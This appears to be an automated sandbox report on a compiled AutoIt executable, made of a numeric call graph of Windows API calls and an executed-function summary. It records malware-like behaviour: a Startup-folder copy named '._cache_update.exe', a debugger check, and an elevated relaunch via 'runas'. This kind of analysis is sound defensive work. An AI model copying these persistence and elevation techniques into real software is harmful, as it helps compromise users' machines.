88414->88416 88415->88394 88416->88394 88417->88402 88419 1924df 88418->88419 88420 12c638 88418->88420 88422 12c4cd 48 API calls 88419->88422 88421 14010a 48 API calls 88420->88421 88423 12c64f MultiByteToWideChar 88421->88423 88424 1924e7 88422->88424 88425 12c6b7 88423->88425 88426 12c66c 88423->88426 88428 12a6f8 48 API calls 88424->88428 88427 12a2fb 48 API calls 88425->88427 88426->88425 88429 12c675 88426->88429 88430 12c6c3 88427->88430 88431 1924f6 88428->88431 88429->88424 88433 12c686 88429->88433 88430->88404 88432 14010a 48 API calls 88431->88432 88437->88414 88438->86861 88439->86863 88441 167700 88440->88441 88452 1676f9 _wcsncpy 88440->88452 88442 14010a 48 API calls 88441->88442 88443 167706 GetFileVersionInfoW 88442->88443 88444 167722 __wsetenvp 88443->88444 88445 14010a 48 API calls 88444->88445 88450 167739 _wcscat _wcscmp _wcscpy _wcsstr 88445->88450 88446 167793 _wcscat 88447 141bc7 _W_store_winword 59 API calls 88446->88447 88448 1677f7 88447->88448 88449 167827 755A1560 88448->88449 88448->88452 88449->88452 88453 16783d _wcscmp 88449->88453 88450->88446 88451 167779 755A1560 88450->88451 88451->88446 88452->86876 88453->88452 88455 14234b 79 API calls 3 library calls 88453->88455 88455->88452 88456->86895 88457->86910 88458->86910 88459->86922 88460->86915 88461->86910 88462->86912 88464 13f057 88463->88464 88465 13f069 88463->88465 88466 13f063 88464->88466 88467 13f05d 88464->88467 88468 12c4cd 48 API calls 88465->88468 88469 12a6d4 48 API calls 88466->88469 88470 12a6d4 48 API calls 88467->88470 88484 1664f5 88468->88484 88471 16668b 88469->88471 88472 13f081 88470->88472 88474 124c4f 50 API calls 88471->88474 88492 124c4f 88472->88492 88477 166699 88474->88477 88485 1666a9 Mailbox 88477->88485 88500 166765 50 API calls 88477->88500 88478 1949b2 88479 166524 88479->86958 88480 12c610 50 API calls 88483 13f0a3 Mailbox 88480->88483 88483->86958 88484->88479 88498 16649b ReadFile SetFilePointerEx 88484->88498 88499 12bd2f 48 API calls _memmove 88484->88499 88485->86958 88486->86935 88487->86962 88488->86931 88489->86939 88490->86953 88491->86960 88493 13f324 48 API calls 88492->88493 88496 124c60 88493->88496 88494 124c95 88494->88478 88494->88480 88495 124ca0 2 API calls 88495->88496 88496->88494 88496->88495 88501 124d29 88496->88501 88498->88484 88499->88484 88500->88485 88502 1945cf 88501->88502 88503 124d3d 88501->88503 88505 12a6f8 48 API calls 88502->88505 88510 124d67 88503->88510 88507 1945da 88505->88507 88506 124d49 88506->88496 88508 14010a 48 API calls 88507->88508 88509 1945ef _memmove 88508->88509 88511 124d7d 88510->88511 88514 124d78 _memmove 88510->88514 88512 14010a 48 API calls 88511->88512 88513 194703 88511->88513 88512->88514 88514->88506 88516 16ae1d 88515->88516 88527 16af1f 88515->88527 88517 16af05 Mailbox 88516->88517 88519 16aebc 88516->88519 88521 16ae2e 88516->88521 88518 14010a 48 API calls 88517->88518 88534 16ae7d Mailbox _memmove 88518->88534 88520 14010a 48 API calls 88519->88520 88520->88534 88525 14010a 48 API calls 88521->88525 88531 16ae4b 88521->88531 88522 16ae86 88528 14010a 48 API calls 88522->88528 88523 16ae76 88526 14010a 48 API calls 88523->88526 88524 14010a 48 API calls 88524->88527 88525->88531 88526->88534 88527->86972 88529 16ae8c 88528->88529 88535 16a65e 48 API calls 88529->88535 88531->88522 88531->88523 88531->88534 88532 16ae98 88533 13f26b 50 API calls 88532->88533 88533->88534 88534->88524 88535->88532 88536->86986 88537->86991 88538->87005 88539 194ddc 88540 134472 88539->88540 88541 194de6 VariantClear 88539->88541 88541->88540 88542 12e85b 88545 12d937 88542->88545 88544 12e865 88546 12d94f 88545->88546 88547 12d9a7 88545->88547 88546->88547 88548 12fa40 401 API calls 88546->88548 88551 12d9d0 88547->88551 88554 16d520 85 API calls 4 library calls 88547->88554 88552 12d986 88548->88552 88550 19979b 88550->88544 88551->88544 88552->88551 88553 12d89e 50 API calls 88552->88553 88553->88547 88554->88550 88555 131118 88556 13e016 50 API calls 88555->88556 88557 13112e 88556->88557 88558 19abeb 88557->88558 88559 131148 88557->88559 88625 13cf79 49 API calls 88558->88625 88561 133680 401 API calls 88559->88561 88601 12fad8 Mailbox _memmove 88561->88601 88563 19b628 Mailbox 88564 19ac2a 88566 19ac4a Mailbox 88564->88566 88626 16ba5d 48 API calls 88564->88626 88629 16d520 85 API calls 4 library calls 88566->88629 88567 12fbf1 Mailbox 88569 13105e 88577 12c935 48 API calls 88569->88577 88571 130dee 88576 12d89e 50 API calls 88571->88576 88572 12c935 48 API calls 88572->88601 88574 131063 88631 16d520 85 API calls 4 library calls 88574->88631 88575 19b772 88633 16d520 85 API calls 4 library calls 88575->88633 88584 130dfa 88576->88584 88577->88567 88579 12f6d0 401 API calls 88579->88601 88580 12d89e 50 API calls 88587 130e83 88580->88587 88581 15a599 InterlockedDecrement 88581->88601 88582 12d3d2 48 API calls 88582->88601 88584->88580 88585 130119 88632 16d520 85 API calls 4 library calls 88585->88632 88586 19b7d2 88589 12caee 48 API calls 88587->88589 88588 141b2a 52 API calls __cinit 88588->88601 88600 1310f1 Mailbox 88589->88600 88593 131230 88593->88567 88630 16d520 85 API calls 4 library calls 88593->88630 88594 14010a 48 API calls 88594->88601 88595 12fa40 401 API calls 88595->88601 88598 19b583 88627 16d520 85 API calls 4 library calls 88598->88627 88628 16d520 85 API calls 4 library calls 88600->88628 88601->88567 88601->88569 88601->88571 88601->88572 88601->88574 88601->88575 88601->88579 88601->88581 88601->88582 88601->88584 88601->88585 88601->88587 88601->88588 88601->88593 88601->88594 88601->88595 88601->88598 88601->88600 88602 181f19 129 API calls 88601->88602 88603 180bfa 128 API calls 88601->88603 88604 17013f 86 API calls 88601->88604 88605 13f03e 2 API calls 88601->88605 88606 16be47 50 API calls 88601->88606 88607 1250a3 49 API calls 88601->88607 88608 1817aa 86 API calls 88601->88608 88609 178065 55 API calls 88601->88609 88610 13f461 97 API calls 88601->88610 88611 179122 90 API calls 88601->88611 88612 1830ad 89 API calls 88601->88612 88613 18798d 108 API calls 88601->88613 88614 18804e 112 API calls 88601->88614 88615 13dd84 3 API calls 88601->88615 88616 1792c0 87 API calls 88601->88616 88617 17b74b 401 API calls 88601->88617 88618 1810e5 81 API calls 88601->88618 88619 13ef0d 93 API calls 88601->88619 88620 131620 59 API calls Mailbox 88601->88620 88621 17ee52 81 API calls 2 library calls 88601->88621 88622 17ef9d 89 API calls Mailbox 88601->88622 88623 16b020 48 API calls 88601->88623 88624 17e713 401 API calls Mailbox 88601->88624 88602->88601 88603->88601 88604->88601 88605->88601 88606->88601 88607->88601 88608->88601 88609->88601 88610->88601 88611->88601 88612->88601 88613->88601 88614->88601 88615->88601 88616->88601 88617->88601 88618->88601 88619->88601 88620->88601 88621->88601 88622->88601 88623->88601 88624->88601 88625->88564 88626->88566 88627->88600 88628->88567 88629->88563 88630->88574 88631->88585 88632->88575 88633->88586 88634 2cc140 88635 2cc150 88634->88635 88636 2cc26a LoadLibraryA 88635->88636 88640 2cc2af VirtualProtect VirtualProtect 88635->88640 88637 2cc281 88636->88637 88637->88635 88639 2cc293 6CA06DE0 88637->88639 88639->88637 88642 2cc2a9 ExitProcess 88639->88642 88641 2cc314 88640->88641 88641->88641 88643 1229c2 88644 1229cb 88643->88644 88645 122a48 88644->88645 88646 1229e9 88644->88646 88682 122a46 88644->88682 88650 122a4e 88645->88650 88651 192307 88645->88651 88647 1229f6 88646->88647 88648 122aac PostQuitMessage 88646->88648 88653 122a01 88647->88653 88654 19238f 88647->88654 88655 122a39 88648->88655 88649 122a2b NtdllDefWindowProc_W 88649->88655 88656 122a53 88650->88656 88657 122a76 SetTimer RegisterClipboardFormatW 88650->88657 88698 12322e 16 API calls 88651->88698 88659 122ab6 88653->88659 88660 122a09 88653->88660 88704 1657fb 60 API calls _memset 88654->88704 88663 1922aa 88656->88663 88664 122a5a KillTimer 88656->88664 88657->88655 88661 122a9f CreatePopupMenu 88657->88661 88658 19232e 88699 13ec33 401 API calls Mailbox 88658->88699 88688 121e58 88659->88688 88666 122a14 88660->88666 88667 192374 88660->88667 88661->88655 88670 1922af 88663->88670 88671 1922e3 MoveWindow 88663->88671 88695 122b94 Shell_NotifyIconW _memset 88664->88695 88673 122a1f 88666->88673 88674 19235f 88666->88674 88667->88649 88703 15b31f 48 API calls 88667->88703 88668 1923a1 88668->88649 88668->88655 88675 1922b3 88670->88675 88676 1922d2 SetFocus 88670->88676 88671->88655 88673->88649 88700 122b94 Shell_NotifyIconW _memset 88673->88700 88702 165fdb 70 API calls _memset 88674->88702 88675->88673 88679 1922bc 88675->88679 88676->88655 88677 122a6d 88696 122ac7 DeleteObject DestroyWindow Mailbox 88677->88696 88697 12322e 16 API calls 88679->88697 88682->88649 88684 19236f 88684->88655 88686 192353 88701 123598 67 API calls _memset 88686->88701 88689 121ef1 88688->88689 88690 121e6f _memset 88688->88690 88689->88655 88705 1238e4 88690->88705 88692 121eda KillTimer SetTimer 88692->88689 88693 121e96 88693->88692 88694 194518 Shell_NotifyIconW 88693->88694 88694->88692 88695->88677 88696->88655 88697->88655 88698->88658 88699->88673 88700->88686 88701->88682 88702->88684 88703->88682 88704->88668 88706 123900 88705->88706 88707 1239d5 Mailbox 88705->88707 88727 127b6e 48 API calls 88706->88727 88707->88693 88709 12390e 88710 19453f LoadStringW 88709->88710 88711 12391b 88709->88711 88714 194559 88710->88714 88712 127e53 48 API calls 88711->88712 88713 123930 88712->88713 88713->88714 88716 123941 88713->88716 88729 1239e8 48 API calls 2 library calls 88714->88729 88718 1239da 88716->88718 88719 12394b 88716->88719 88717 194564 88722 194578 88717->88722 88724 123956 _memset _wcscpy 88717->88724 88721 12c935 48 API calls 88718->88721 88728 1239e8 48 API calls 2 library calls 88719->88728 88721->88724 88730 1239e8 48 API calls 2 library calls 88722->88730 88726 1239ba Shell_NotifyIconW 88724->88726 88725 194586 88726->88707 88727->88709 88728->88724 88729->88717 88730->88725 88731 191e8b 88736 13e44f 88731->88736 88735 191e9a 88737 14010a 48 API calls 88736->88737 88738 13e457 88737->88738 88739 13e46b 88738->88739 88744 13e74b 88738->88744 88743 141b2a 52 API calls __cinit 88739->88743 88743->88735 88745 13e463 88744->88745 88746 13e754 88744->88746 88748 13e47b 88745->88748 88776 141b2a 52 API calls __cinit 88746->88776 88749 12d3d2 48 API calls 88748->88749 88750 13e492 GetVersionExW 88749->88750 88751 127e53 48 API calls 88750->88751 88752 13e4d5 88751->88752 88777 13e5f8 88752->88777 88755 13e617 48 API calls 88758 13e4e9 88755->88758 88757 1929f9 88758->88757 88781 13e6d1 88758->88781 88760 13e576 88762 13e59e 88760->88762 88763 13e5ec GetSystemInfo 88760->88763 88761 13e55f GetCurrentProcess 88790 13e70e LoadLibraryA 6CA06DE0 88761->88790 88784 13e694 88762->88784 88765 13e5c9 88763->88765 88768 13e5d7 FreeLibrary 88765->88768 88769 13e5dc 88765->88769 88768->88769 88769->88739 88770 13e5e4 GetSystemInfo 88772 13e5be 88770->88772 88771 13e5b4 88787 13e437 88771->88787 88772->88765 88775 13e5c4 FreeLibrary 88772->88775 88775->88765 88776->88745 88778 13e601 88777->88778 88779 12a2fb 48 API calls 88778->88779 88780 13e4dd 88779->88780 88780->88755 88791 13e6e3 88781->88791 88795 13e6a6 88784->88795 88788 13e694 2 API calls 88787->88788 88789 13e43f GetNativeSystemInfo 88788->88789 88789->88772 88790->88760 88792 13e55b 88791->88792 88793 13e6ec LoadLibraryA 88791->88793 88792->88760 88792->88761 88793->88792 88794 13e6fd 6CA06DE0 88793->88794 88794->88792 88796 13e5ac 88795->88796 88797 13e6af LoadLibraryA 88795->88797 88796->88770 88796->88771 88797->88796 88798 13e6c0 6CA06DE0 88797->88798 88798->88796 88799 191eca 88804 13be17 88799->88804 88803 191ed9 88805 12d3d2 48 API calls 88804->88805 88806 13be85 88805->88806 88812 13c929 88806->88812 88808 13bf22 88809 13bf3e 88808->88809 88815 13c8b7 48 API calls _memmove 88808->88815 88811 141b2a 52 API calls __cinit 88809->88811 88811->88803 88816 13c955 88812->88816 88815->88808 88817 13c948 88816->88817 88818 13c962 88816->88818 88817->88808 88818->88817 88819 13c969 RegOpenKeyExW 88818->88819 88819->88817 88820 13c983 RegQueryValueExW 88819->88820 88821 13c9b9 RegCloseKey 88820->88821 88822 13c9a4 88820->88822 88821->88817 88822->88821 88823 146a80 88824 146a8c __wsopen_helper 88823->88824 88860 148b7b GetStartupInfoW 88824->88860 88827 146ae9 88829 146af4 88827->88829 88947 146bd0 47 API calls 3 library calls 88827->88947 88828 146a91 88862 14a937 GetProcessHeap 88828->88862 88863 1487d7 88829->88863 88832 146afa 88833 146b05 __RTC_Initialize 88832->88833 88948 146bd0 47 API calls 3 library calls 88832->88948 88884 14ba66 88833->88884 88836 146b14 88837 146b20 GetCommandLineW 88836->88837 88949 146bd0 47 API calls 3 library calls 88836->88949 88903 153c2d GetEnvironmentStringsW 88837->88903 88840 146b1f 88840->88837 88844 146b45 88916 153a64 88844->88916 88847 146b56 88930 141db5 88847->88930 88851 146b5e 88852 146b69 __wwincmdln 88851->88852 88952 141d7b 47 API calls 3 library calls 88851->88952 88934 123682 88852->88934 88861 148b91 88860->88861 88861->88828 88862->88827 88955 141e5a 30 API calls 2 library calls 88863->88955 88865 1487dc 88956 148ab3 InitializeCriticalSectionAndSpinCount 88865->88956 88867 1487e1 88868 1487e5 88867->88868 88958 148afd TlsAlloc 88867->88958 88957 14884d 50 API calls 2 library calls 88868->88957 88871 1487f7 88871->88868 88873 148802 88871->88873 88872 1487ea 88872->88832 88959 147616 88873->88959 88876 148844 88967 14884d 50 API calls 2 library calls 88876->88967 88879 148823 88879->88876 88881 148829 88879->88881 88880 148849 88880->88832 88966 148724 47 API calls 4 library calls 88881->88966 88883 148831 GetCurrentThreadId 88883->88832 88885 14ba72 __wsopen_helper 88884->88885 88976 148984 88885->88976 88887 14ba79 88888 147616 __calloc_crt 47 API calls 88887->88888 88889 14ba8a 88888->88889 88890 14baf5 GetStartupInfoW 88889->88890 88891 14ba95 __wsopen_helper @_EH4_CallFilterFunc@8 88889->88891 88898 14bb0a 88890->88898 88899 14bc33 88890->88899 88891->88836 88892 14bcf7 88983 14bd0b RtlLeaveCriticalSection _doexit 88892->88983 88894 14bc7c GetStdHandle 88894->88899 88895 14bb58 88895->88899 88901 14bb98 InitializeCriticalSectionAndSpinCount 88895->88901 88902 14bb8a GetFileType 88895->88902 88896 147616 __calloc_crt 47 API calls 88896->88898 88897 14bc8e GetFileType 88897->88899 88898->88895 88898->88896 88898->88899 88899->88892 88899->88894 88899->88897 88900 14bcbb InitializeCriticalSectionAndSpinCount 88899->88900 88900->88899 88901->88895 88902->88895 88902->88901 88904 146b30 88903->88904 88906 153c3e 88903->88906 88910 15382b GetModuleFileNameW 88904->88910 89022 147660 47 API calls __crtGetStringTypeA_stat 88906->89022 88908 153c64 _memmove 88909 153c7a FreeEnvironmentStringsW 88908->88909 88909->88904 88912 15385f _wparse_cmdline 88910->88912 88911 146b3a 88911->88844 88950 141d7b 47 API calls 3 library calls 88911->88950 88912->88911 88913 153899 88912->88913 89023 147660 47 API calls __crtGetStringTypeA_stat 88913->89023 88915 15389f _wparse_cmdline 88915->88911 88917 153a7d __wsetenvp 88916->88917 88921 146b4b 88916->88921 88918 147616 __calloc_crt 47 API calls 88917->88918 88926 153aa6 __wsetenvp 88918->88926 88919 153afd 88920 1428ca _free 47 API calls 88919->88920 88920->88921 88921->88847 88951 141d7b 47 API calls 3 library calls 88921->88951 88922 147616 __calloc_crt 47 API calls 88922->88926 88923 153b22 88924 1428ca _free 47 API calls 88923->88924 88924->88921 88926->88919 88926->88921 88926->88922 88926->88923 88927 153b39 88926->88927 89024 153317 47 API calls __strnicmp_l 88926->89024 89025 147ab0 IsProcessorFeaturePresent 88927->89025 88931 141dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 88930->88931 88933 141e00 __IsNonwritableInCurrentImage 88931->88933 89048 141b2a 52 API calls __cinit 88931->89048 88933->88851 88947->88829 88948->88833 88949->88840 88955->88865 88956->88867 88957->88872 88958->88871 88961 14761d 88959->88961 88962 14765a 88961->88962 88963 14763b Sleep 88961->88963 88968 153e5a 88961->88968 88962->88876 88965 148b59 TlsSetValue 88962->88965 88964 147652 88963->88964 88964->88961 88964->88962 88965->88879 88966->88883 88967->88880 88969 153e65 88968->88969 88974 153e80 __calloc_impl 88968->88974 88970 153e71 88969->88970 88969->88974 88975 14889e 47 API calls __getptd_noexit 88970->88975 88971 153e90 RtlAllocateHeap 88973 153e76 88971->88973 88971->88974 88973->88961 88974->88971 88974->88973 88975->88973 88977 148995 88976->88977 88978 1489a8 RtlEnterCriticalSection 88976->88978 88984 148a0c 88977->88984 88978->88887 88980 14899b 88980->88978 89008 141d7b 47 API calls 3 library calls 88980->89008 88983->88891 88985 148a18 __wsopen_helper 88984->88985 88986 148a21 88985->88986 88987 148a39 88985->88987 89009 148e52 47 API calls __NMSG_WRITE 88986->89009 88988 148a37 88987->88988 88994 148aa1 __wsopen_helper 88987->88994 88988->88987 89012 147660 47 API calls __crtGetStringTypeA_stat 88988->89012 88991 148a26 89010 148eb2 47 API calls 7 library calls 88991->89010 88992 148a4d 88995 148a54 88992->88995 88996 148a63 88992->88996 88994->88980 89013 14889e 47 API calls __getptd_noexit 88995->89013 88999 148984 __lock 46 API calls 88996->88999 88997 148a2d 89011 141d65 GetModuleHandleExW 6CA06DE0 ExitProcess ___crtCorExitProcess 88997->89011 89002 148a6a 88999->89002 89001 148a59 89001->88994 89003 148a8e 89002->89003 89004 148a79 InitializeCriticalSectionAndSpinCount 89002->89004 89014 1428ca 89003->89014 89005 148a94 89004->89005 89020 148aaa RtlLeaveCriticalSection _doexit 89005->89020 89009->88991 89010->88997 89012->88992 89013->89001 89015 1428d3 RtlFreeHeap 89014->89015 89019 1428fc __dosmaperr 89014->89019 89016 1428e8 89015->89016 89015->89019 89021 14889e 47 API calls __getptd_noexit 89016->89021 89018 1428ee GetLastError 89018->89019 89019->89005 89020->88994 89021->89018 89022->88908 89023->88915 89024->88926 89026 147abb 89025->89026 89031 147945 89026->89031 89032 14795f _memset __call_reportfault 89031->89032 89048->88933 89834 191eed 89839 13e975 89834->89839 89836 191f01 89855 141b2a 52 API calls __cinit 89836->89855 89838 191f0b 89840 14010a 48 API calls 89839->89840 89841 13ea27 GetModuleFileNameW 89840->89841 89842 14297d __wsplitpath 47 API calls 89841->89842 89843 13ea5b _wcsncat 89842->89843 89856 142bff 89843->89856 89846 14010a 48 API calls 89847 13ea94 _wcscpy 89846->89847 89848 12d3d2 48 API calls 89847->89848 89849 13eacf 89848->89849 89859 13eb05 89849->89859 89851 13eae0 Mailbox 89851->89836 89852 12a4f6 48 API calls 89854 13eada _wcscat __wsetenvp _wcsncpy 89852->89854 89853 14010a 48 API calls 89853->89854 89854->89851 89854->89852 89854->89853 89855->89838 89872 14aab9 89856->89872 89860 12c4cd 48 API calls 89859->89860 89861 13eb14 RegOpenKeyExW 89860->89861 89862 13eb35 89861->89862 89863 194b17 RegQueryValueExW 89861->89863 89862->89854 89864 194b86 89863->89864 89865 194b30 89863->89865 89866 14010a 48 API calls 89865->89866 89867 194b49 89866->89867 89868 124bce 48 API calls 89867->89868 89869 194b53 RegQueryValueExW 89868->89869 89869->89864 89870 194b6f 89869->89870 89871 127e53 48 API calls 89870->89871 89871->89864 89873 14abc6 89872->89873 89874 14aaca 89872->89874 89882 14889e 47 API calls __getptd_noexit 89873->89882 89874->89873 89880 14aad5 89874->89880 89876 14abbb 89883 147aa0 8 API calls __strnicmp_l 89876->89883 89878 13ea8a 89878->89846 89880->89878 89881 14889e 47 API calls __getptd_noexit 89880->89881 89881->89876 89882->89876 89883->89878 89884 12e849 89887 1326c0 89884->89887 89886 12e852 89888 19862d 89887->89888 89889 13273b 89887->89889 90009 16d520 85 API calls 4 library calls 89888->90009 89894 132adc 89889->89894 89895 13277c 89889->89895 89904 13279a 89889->89904 89891 19863e 90010 16d520 85 API calls 4 library calls 89891->90010 89892 132a84 89901 12d380 55 API calls 89892->89901 89893 1327cf 89893->89891 89897 1327db 89893->89897 90008 12d349 53 API calls 89894->90008 89932 1328f6 89895->89932 90004 12d500 53 API calls __cinit 89895->90004 89898 1327ef 89897->89898 89913 19865a 89897->89913 89902 132806 89898->89902 89903 1986c9 89898->89903 89905 132aab 89901->89905 89906 12fa40 401 API calls 89902->89906 89907 198ac9 89903->89907 89910 12fa40 401 API calls 89903->89910 89904->89892 89904->89893 89916 132914 89904->89916 89909 12d2d2 53 API calls 89905->89909 89944 13281d 89906->89944 90025 16d520 85 API calls 4 library calls 89907->90025 89909->89916 89911 1986ee 89910->89911 89918 12d89e 50 API calls 89911->89918 89924 19870a 89911->89924 89927 1329ec 89911->89927 89913->89903 89913->89927 90011 17f211 401 API calls 89913->90011 90012 17f4df 401 API calls 89913->90012 89914 198980 90020 16d520 85 API calls 4 library calls 89914->90020 89919 12cdb4 48 API calls 89916->89919 89917 132836 89917->89907 89922 12fa40 401 API calls 89917->89922 89918->89924 89928 13296e 89919->89928 89921 1328cc 89921->89932 90005 12cf97 58 API calls 89921->90005 89947 13287c 89922->89947 89923 12c935 48 API calls 89923->89917 89930 19878d 89924->89930 90013 12346e 48 API calls 89924->90013 89926 1328ac 89926->89921 90018 12cf97 58 API calls 89926->90018 89927->89886 89928->89927 89936 132984 89928->89936 89937 198a97 89928->89937 89943 1989b4 89928->89943 89931 19883f 89930->89931 89935 19882d 89930->89935 90014 164e71 53 API calls __cinit 89930->90014 90016 17c235 401 API calls Mailbox 89931->90016 89941 132900 89932->89941 90019 12cf97 58 API calls 89932->90019 89938 12ca8e 48 API calls 89935->89938 89936->89937 90006 1341fc 83 API calls 89936->90006 89937->89927 90024 124b02 50 API calls 89937->90024 89938->89931 89939 198888 89939->89944 89945 19888c 89939->89945 89941->89914 89941->89916 89990 17bf80 89943->89990 89944->89917 89944->89923 89944->89927 90017 16d520 85 API calls 4 library calls 89945->90017 89947->89926 89947->89927 89952 12fa40 401 API calls 89947->89952 89950 1329b8 89953 198a7e 89950->89953 90007 1341fc 83 API calls 89950->90007 89959 1988ff 89952->89959 90023 13ee93 83 API calls 89953->90023 89954 198725 89954->89935 89965 1314a0 48 API calls 89954->89965 89955 1989f3 89971 198a01 89955->89971 89972 198a42 89955->89972 89956 1987ca 89957 198813 89956->89957 89961 1284a6 80 API calls 89956->89961 89963 12d89e 50 API calls 89957->89963 89959->89927 89966 12d89e 50 API calls 89959->89966 89979 1987e0 89961->89979 89962 1329ca 89962->89927 89967 198a6f 89962->89967 89968 1329e5 89962->89968 89964 198821 89963->89964 89969 12d89e 50 API calls 89964->89969 89970 19875d 89965->89970 89966->89926 90022 17d1da 50 API calls 89967->90022 89973 14010a 48 API calls 89968->89973 89969->89935 89970->89935 89977 1314a0 48 API calls 89970->89977 89974 12ca8e 48 API calls 89971->89974 89975 12d89e 50 API calls 89972->89975 89973->89927 89974->89927 89978 198a4b 89975->89978 89980 198775 89977->89980 89981 12d89e 50 API calls 89978->89981 89979->89957 90015 16a76d 49 API calls 89979->90015 89983 12d89e 50 API calls 89980->89983 89984 198a57 89981->89984 89986 198781 89983->89986 90021 124b02 50 API calls 89984->90021 89985 198807 89988 12d89e 50 API calls 89985->89988 89989 12d89e 50 API calls 89986->89989 89988->89957 89989->89930 89991 17bfd9 _memset 89990->89991 89994 17c14c 89991->89994 89997 17c097 VariantInit 89991->89997 90002 17c033 89991->90002 89993 17c22e 89993->89955 89995 17c19f VariantInit VariantClear 89994->89995 89994->90002 89996 17c1c5 89995->89996 89998 17c1e6 89996->89998 89996->90002 90001 17c0d6 89997->90001 90027 16a6f6 102 API calls 89998->90027 90000 17c20d VariantClear 90000->89993 90001->90002 90026 16a6f6 102 API calls 90001->90026 90028 17c235 401 API calls Mailbox 90002->90028 90004->89904 90005->89932 90006->89950 90007->89962 90008->89926 90009->89891 90010->89913 90011->89913 90012->89913 90013->89954 90014->89956 90015->89985 90016->89939 90017->89927 90018->89921 90019->89941 90020->89927 90021->89927 90022->89953 90023->89937 90024->89907 90025->89927 90026->89994 90027->90000 90028->89993 90029 133588 90053 13308b 90029->90053 90030 1335b0 90055 12203a 401 API calls 90030->90055 90031 17d154 48 API calls 90031->90053 90034 1984b0 90045 1332b9 90034->90045 90062 16d520 85 API calls 4 library calls 90034->90062 90035 1331dc 90035->90034 90039 13366d 90035->90039 90035->90045 90047 19833f VariantClear 90035->90047 90036 19848d 90060 16d520 85 API calls 4 library calls 90036->90060 90038 133665 90058 16d520 85 API calls 4 library calls 90038->90058 90039->90045 90063 16d520 85 API calls 4 library calls 90039->90063 90041 123320 48 API calls 90041->90053 90046 198478 90059 16d520 85 API calls 4 library calls 90046->90059 90047->90035 90049 12fa40 401 API calls 90049->90053 90050 1984a4 90061 16d520 85 API calls 4 library calls 90050->90061 90052 1335f0 90054 12c935 48 API calls 90052->90054 90053->90030 90053->90031 90053->90035 90053->90036 90053->90038 90053->90041 90053->90046 90053->90049 90053->90050 90053->90052 90056 15a599 InterlockedDecrement 90053->90056 90057 12346e 48 API calls 90053->90057 90054->90035 90055->90035 90056->90053 90057->90053 90058->90045 90059->90045 90060->90045 90061->90034 90062->90045 90063->90045 90064 19bc25 90065 19bc27 90064->90065 90068 1679f8 SHGetFolderPathW 90065->90068 90067 19bc30 90067->90067 90069 127e53 48 API calls 90068->90069 90070 167a25 90069->90070 90070->90067 90071 19c146 GetUserNameW

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 0012374E Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 145windowCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0012376D
                                                                                                                                                            • Part of subcall function 00124257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,00000000,00000001,00000000), ref: 0012428C
                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?), ref: 0012377F
                                                                                                                                                          • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,001E1120,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,001E1124,?,?), ref: 001237EE
                                                                                                                                                            • Part of subcall function 001234F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0012352A
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00123860
                                                                                                                                                          • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,001D2934,00000010), ref: 001921C5
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?), ref: 001921FD
                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00192232
                                                                                                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,001BDAA4), ref: 00192290
                                                                                                                                                          • ShellExecuteW.SHELL32(00000000), ref: 00192297
                                                                                                                                                            • Part of subcall function 001230A5: GetSysColorBrush.USER32(0000000F), ref: 001230B0
                                                                                                                                                            • Part of subcall function 001230A5: LoadCursorW.USER32(00000000,00007F00), ref: 001230BF
                                                                                                                                                            • Part of subcall function 001230A5: LoadIconW.USER32(00000063), ref: 001230D5
                                                                                                                                                            • Part of subcall function 001230A5: LoadIconW.USER32(000000A4), ref: 001230E7
                                                                                                                                                            • Part of subcall function 001230A5: LoadIconW.USER32(000000A2), ref: 001230F9
                                                                                                                                                            • Part of subcall function 001230A5: RegisterClassExW.USER32(?), ref: 00123167
                                                                                                                                                            • Part of subcall function 00122E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00122ECB
                                                                                                                                                            • Part of subcall function 00122E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00122EEC
                                                                                                                                                            • Part of subcall function 00122E9D: ShowWindow.USER32(00000000), ref: 00122F00
                                                                                                                                                            • Part of subcall function 00122E9D: ShowWindow.USER32(00000000), ref: 00122F09
                                                                                                                                                            • Part of subcall function 00123598: _memset.LIBCMT ref: 001235BE
                                                                                                                                                            • Part of subcall function 00123598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00123667
                                                                                                                                                          Strings
                                                                                                                                                          • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 001921BE
                                                                                                                                                          • runas, xrefs: 0019228B
                                                                                                                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, xrefs: 001237B4, 001237E9, 001237FD, 00192257
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
